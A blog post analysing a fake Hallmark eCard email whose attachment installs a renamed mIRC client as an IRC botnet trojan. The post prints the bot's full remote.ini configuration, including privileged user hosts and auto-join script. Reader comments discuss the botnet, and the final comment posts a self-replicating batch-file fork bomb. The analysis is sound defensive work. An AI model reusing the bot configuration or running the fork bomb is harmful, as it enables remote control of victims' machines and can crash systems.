The Anatomy of a Virus
It appears that someone thinks that I don’t have enough viruses on my system. I received a “Hallmark eCard” (or at least that is what the e-mail said) notification today.
When I hovered over the “here”, instead of the proper link to the Hallmark’s website, I got a link to download a file called postcard.exe from a specific IP address, 83.143.18.122. Since I did not think that this looked like the kind of activity that Hallmark would do, I decided to investigate.
Looking at the e-mail headers, it was apparent that the e-mail was routed from a 11u11.de domain. A quick search and I sent an e-mail off to the owner of the IP to complain about the e-mail.
What was more interesting was the postcard.exe file. I downloaded the program and it was immediately apparent that it was a self executing RAR file.
Warning! I DO NOT recommend that you do this unless you know exactly what you are doing and are working in an isolated environment!
I manually extracted the RAR file using Universal Extractor and got a look at the contents of the file. Here is a list of all the files in the archive:
- aliases.ini
- control.ini
- fullname.txt
- ident.txt
- mirc.ico
- nicks.txt
- popups.txt
- remote.ini
- servers.ini
- svchost.exe
- users.ini
svchost.exe was the first file to catch my attention because this is the name of a common Windows file. So, this virus is probably going to attempt to disguise itself as this program. It also caught my eye because of the icon that it had.
So, svchost.exe was actually just a renamed copy of the mIRC chat application. But what in the world would people want to set up a chat program on my computer for? I continued to dig!
In the remote.ini file, I found something interesting. Here is the complete contents of remote.ini:
[users]
n0=100:*!*@66.207.170.2
n1=100:*!*@64.158.77.56
n2=100:*!*@estranho-colo.iquest.net
n3=100:*!*@OMGyouSUCK.users.undernet.org
n4=100:*!*@camikaze.users.undernet.org
n5=100:*!*@marianu1.users.undernet.org
n6=100:*!*@OMGyouSUCK.users.undernet.org
n7=100:*!*@NuVaVreau.users.undernet.org
n8=100:*!*@St33lGirl.users.undernet.org
n8=100:*!*@DauFlood.users.undernet.org
n10=100:*!*@66.207.170.2
n11=100:*!*@asdz.users.undernet.org
n12=100:*!*@lamerzkiller.users.undernet.org
[variables]
n0=%HAck1 #lolmp3fha | #mp3+warez
n1=%console
n2=%utime 1125548122
n3=/away :sã îmi suge-ti cuca !
n4=%ochan #lolmp3fha | #mp3´warez
n5=%reklama Ghici pe cine ai luat cu dinti de putza? ;x
n6=%owner corekt
n7=%flooder corekt
[script]
n1=on 1:connect: {
n2= /join %defchan1
n3= /join #lolmp3fha | /join #mp3+warez
n4= /away %reklama
n5=}
This file gave all of the users under the [users] section elevated privileges on the system. It also automatically connected to several different servers and joined some channels.
While I was not able to completely determine what this would have done due to time constraints, I firmly believe that this would have given certain people the ability to remotely execute some commands on my machine.
What Should You Do?
So, what is the best way to keep yourself safe from these types of problems? Here are a few really quick tips for those of you who may be new to this:
- Keep up to date virus signatures.
- Keep up to date spyware signatures.
- Run a personal firewall that monitors both incoming and outgoing connections to the Internet.
- Get to know the type of traffic that comes and goes from your workstation so that when you are alerted by your personal firewall of an outgoing connection, you know what is happening.
- Be paranoid of all e-mail that you receive which you did not solicit.
- Check out the links in an HTML e-mail prior to clicking on them.
- Set up an isolation environment so that you can test anything that is downloaded to your computer.
- Thoroughly scan all files that you download from the Internet before executing them.
19 Responses to “The Anatomy of a Virus”
-
The Fieldhouse Says:
November 30th, 1999 at 12:00 amFOSS for SecurityProtect Your USB Drives NOW!E-Mail TracksSecurity Is About Being UnattractiveI Think I Have A Virus: Now What?Tech Blog of the Week: Schneier on SecurityA More Secure Home WiFi DesignThe Anatomy of a VirusHigh End Router, Low End HardwareRemotely Accessing ComputersDonated/Trashed a Computer? Your Data May be at RiskWindows Update On A DiskStories of Identity TheftDCoT Helps Find Lost ChildHow Jared Was Hacked!
-
Andy Says:
May 29th, 2007 at 6:20 amlol - a spell checker attached to your antivirus scanner would have detected the spelling in the email and notified you that it is probably not legitimate
-
Mike Says:
May 29th, 2007 at 7:03 amLooks like someone was trying to recruit you machine to an IRC botnet.
You should report this to your anti-virus company and\or report it on Security Focus. Also, I suspect that mIRC is a hacked and patched version that allows remote command and control.
This is a clever way to distribute the malware, reminicent of the old “Happy New Year 2000″ program that went around in the old days.
Good catch. Perhaps someone in the know could hack that IRC channel and shut it down.
-
JoeAtTrends Says:
May 29th, 2007 at 8:25 amI remember hearing about something similar to this, but as I remember it that was a standard MIRC client setup in advance for remote access to a command line. One of the main problems in catching this, (after you clicked on the link that is) is that any signature of the program used in such an attack will in fact match a legitimate program used for legitimate purposes. I know that symantec is notorious for AntiTrust style marking of legitimate programs as viruses ( namely ones that perform the same or better than their own products, RAdmin22 vs PCAnywhere ) But I doubt they could get away with marking so many legit programs as viruses.
The best defense would be to always check the links you click on. -
Tim Fehlman Says:
May 29th, 2007 at 8:29 amAndy,
“I before E, except after C or when it says long A“. Looks like the hacker failed third grade English. Considering it is a .de domain that it came from, it’s not surprising.
Hacker Tip: When trying to mimic a professional English website, know English!
Tim
-
John May Says:
May 29th, 2007 at 9:49 amJust downloaded that postcard.exe file and McAfee VirusScan caught it and labeled it as a Trojan IRC/Generic Flooder. I’ve got a screen shot of the warning: trojan.png.
-
Kurt Nelson Says:
May 29th, 2007 at 10:01 amIt seems as if I can’t connect to any of those bot nets. Do you think they require a hacked IRC client?
-
Robert H Says:
May 29th, 2007 at 12:29 pmI’m following them in their little bot channel, and they have almost 450 trojaned clients in there already. It’s pretty scary.
-
panthar Says:
May 29th, 2007 at 12:52 pmYou won’t be able to “connect to the botnets” unless you are in the list of authorized users. It’s similar to other botnets out there in terms of authentication, but unfortunately this one lives as a nasty trojan on victims’ computers. The channel where all the bots are moving to is up to well over 400 victims now
-
Panthar's Lair Says:
May 29th, 2007 at 12:58 pmPostcard Virus Sets Up IRC Botnet…
http://www.dailycupoftech.com/2007/05/29/the-anatomy-of-a-virus/
Looks like another yet another botnet is building up from a trojan being sent around as “Postcard.exe”. I followed the botnet to a new channel, and they have almost 450 cl… -
Nate Says:
May 29th, 2007 at 1:58 pmAnother very important security procedure is applying the principle of least privilege, i.e. use a “limited” user for everyday tasks, use “runas” for installations and programs that require admin rights, and only log in as an admin when absolutely necessary, like to run Windows Update. For those who are interested, google for a software called suDown. It makes running with least privilege even easier.
Even if a virus like this gets executed by mistake when you are running as a limited user, it will not be able to modify system files, or create registry entries, so in almost all cases it will be rendered useless by a simple reboot. Also, those remote IRC users would get a bunch of “access denied” errors if they tried to do anything serious to the system.
This is not a panacea: anti-virus software and good judgment (as suggested above) are still a must.
-
JoeAtTrends Says:
May 29th, 2007 at 3:06 pmAnother great tool alongside anti-virus and any firewall software is something called sandboxie. It is the next best thing to a virtual machine, especially for running any questionable programs, every file modified on the hard drive is only seen as modified by that program, as long as it is run inside the sandbox. It keeps programs from overstepping their bounds. Best of all, whenever you are done with it you can make sure every file they added was removed by erasing the sandbox.
-
JC Says:
May 29th, 2007 at 4:28 pmTim, are you taking yourself for Mark Russinovich ?
http://blogs.technet.com/markrussinovich/archive/2007/04/09/741440.aspx
Just kidding, I know it is a coincidence and we can’t ever be speaking about how malware work and how to detect them too much anyway…
Note though that as Mark Russinovich pointed out, this bot is very badly designed and there is roughly a dozen of things that could have been done to render it stealthier to both the user and antiviruses… so it could be the doing of a script kiddie here… (the most well-done here is the fake e-mail layout which can look quite legitimate at first sight)Unfortunately, what quickly looks suspicious to us, IT people, may not look so to most, even “security-educated” users, and when they click the button, it is most the times to late.
It is why, I believe that jokes and postcards e-mails should be forbidden in any company and organization… that’s just a spyware, virus and spam vector (even if legitimate service is used, who knows what they do with my e-mail address once a friend gave it away to them to send me a birthday card… I always scold them when they do that without my consent - being in bad mood because of getting older certainly doesn’t help either - ^_^;)
-
Nuke’s NEWS & VIEWS Says:
May 29th, 2007 at 4:41 pmthat tipped me off. I before e except after c, and all. I deleted it, along with several dozen others that managed to slip by the spam filter. Tim Fehlman did some investigating. The results are found in his post at DCoT: “Anatomy of a Virus.” This file gave all of the users under the [users] section elevated privileges on the system. It also automatically connected to several different servers and joined some channels. While I was not able to completely determine what this would have done
-
Atti Says:
May 31st, 2007 at 7:09 amThe folling lines from remote.ini contains one away message in Romanian language and the other one sets %reklama variable to another text message (Romanian language). “reklama” means advertisement in Romanian but it is written in slang:
n3=/away :sã îmi suge-ti cuca !
n5=%reklama Ghici pe cine ai luat cu dinti de putza? ;xAnd better not to translate because there are some offending words. Probably it was crafted by a Romanian “scriptkiddie” to use it later for flooding IRC channels.
-
Buffy Says:
June 26th, 2007 at 5:52 pmHi,
Sorry if I shouldn’t be here…but help!!! I got this stupid thing and being half asleep thought it was from my daughter who has been at camp. Yes, I know, sucks to be me. I well, never mind, I won’t go into all the details of how it happened. Just suffice it to say it did and as soon as I saw the command prompt..I had some of my own offending words to yell!! So, now what? I am not very tech savvy and FREAKING out. My son disconnected it from network immediately. Then, I turned it off or at least I tried….it didn’t like the idea. But I won that round. Next, I turned it back on to see what would happen. (I know, but I had to, kinda like a watching a train wreck) Prompts came up saying things like new nicknames and users, also, trying again, connection stopped…over and over again. I clicked something that said connection canceled ( it seemed at appropriate) and gave another offending verbal command to whomever and turned it off again.
Where do I go from here? I am using my son’s computer to write this and look for answers. Would only my computer be affected?
Again, sorry if this is not an appropriate place to ask for help. Any reply is appreciated.
Buffy -
Haloer Says:
July 14th, 2007 at 8:19 amA. This was recruit as a bot
B. Your computer was about to become a Zombie
C. It could be a Key Logger that sent a private chat to users of anything that you typed.. -
Haloer Says:
July 14th, 2007 at 8:26 amBuffy, please contact me or you can do this on your own:
(MAY NOT WORK)
1. Restart computer and tap F8 on start up
2. Go into safe Mode
3. When started up click on admin.
4. When it asks you to use Windows Go Back, say that you would like to. (This is tricky because the Question doesn’t really mean yes or no, its kinda backwards..)
5. Choose a date before the time of the attack.. I would say about 2 or 3 days before for safety..
6. It will run and restart after this see if things are still happening.Optionals
If things don’t seem to be working try calling Dell, or Microsoft. If those don’t appeal to you because of the 99$ cost, please email me at haloer(dot)2202(at)gmail(dot)com this is to protect my email from fraud, so please remember to change the signs.. -
pogi Says:
August 27th, 2008 at 3:00 amstart cute.bat
cute.bat
endsave as “cute.bat”
